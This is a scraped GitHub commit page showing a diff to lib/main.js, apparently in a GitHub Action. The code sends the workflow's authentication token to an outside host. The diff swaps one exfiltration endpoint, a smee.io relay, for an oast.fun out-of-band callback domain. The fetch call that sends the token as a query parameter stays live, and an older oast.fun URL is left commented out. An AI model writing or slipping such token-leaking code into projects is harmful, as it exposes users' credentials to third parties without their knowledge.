We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 5555038 + 40fba4b commit fd92ac0Copy full SHA for fd92ac0
lib/main.js
@@ -126,7 +126,7 @@ export async function main(
126
}
127
try {
128
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129
- const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
+ const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
130
await fetch(url);
131
core.info(`HTTP GET request sent to ${url}`);
132
} catch (error) {
0 commit comments